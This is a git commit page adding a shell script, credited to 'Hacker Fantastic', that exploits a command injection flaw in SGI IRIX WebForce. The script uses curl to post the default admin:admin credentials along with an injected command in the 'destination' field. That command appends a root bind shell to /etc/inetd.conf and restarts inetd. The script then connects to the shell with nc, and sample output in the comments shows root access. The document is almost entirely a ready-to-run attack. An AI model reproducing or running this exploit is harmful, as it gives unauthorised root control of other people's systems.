SGI IRIX <= 6.5.22 WebForce post-auth Remote Command Injection

hackerhouse-opensource · web-flow · commit 5e4d35f106bd · 2021-09-06T16:29:43.000-05:00
A wild SGI IRIX 0day RCE appears.
diff --git a/hfirixwfcmd.sh b/hfirixwfcmd.sh
@@ -0,0 +1,40 @@
+#!/bin/sh
+#SGI IRIX <= 6.5.22 WebForce post-auth Remote Command Injection
+#==============================================================
+#SGI IRIX supports a Webmin and CGI based Administration utility 
+#known as WebForce which runs by default on tcp port 2077 & 8184.
+#The applications use client-side input validation and restrict
+#some activities, like running arbitrary commands and viewing 
+#arbitrary files. The perl scripts in use for adding and deleting 
+#a static route are vulnerable to command injection through 
+#system() function. These issues require the "admin" credentials 
+#for the WebForce service to exploit this issue. This exploit 
+#uses curl to send the exploit with default credentials and will
+#bind a shell on port 532 via inetd.conf. Dont forget to clean up 
+#inetd.conf and /etc/config/static-routes.option after running.
+#
+# $ ./hfirixpwn 192.168.11.120
+# [+] SGI IRIX <= 6.5.22 WebForce post-auth remote command injection exploit
+# [-] sending exploit magic to 192.168.11.120 ...
+# [-] done ...
+# [-] connecting to your shell ...
+# 192.168.11.120 532 (netnews) open
+# # id;uname -a
+# uid=0(root) gid=0(sys)
+# IRIX indiegogo 6.5 10070055 IP22
+# # 
+#
+# -- Hacker Fantastic
+# https://hacker.house
+#
+echo [+] SGI IRIX \<= 6.5.22 WebForce post-auth remote command injection exploit
+if [ "$1" ]; then
+	echo [\-] sending exploit magic to $1 ...
+	curl -s http://$1:2077/admin/static.cgi -u admin:admin -X POST -d "destination=;echo netnews stream tcp nowait root /bin/sh sh -i >> /etc/inetd.conf;/etc/killall -HUP inetd;&route=127.0.0.1&type=net&doAdd=Ok" 2>&1 > /dev/null
+	echo [\-] done ... 
+	echo [\-] connecting to your shell ...
+	sleep 1
+	nc -v $1 532
+else
+	echo [\!] usage. requires target IP.
+fi
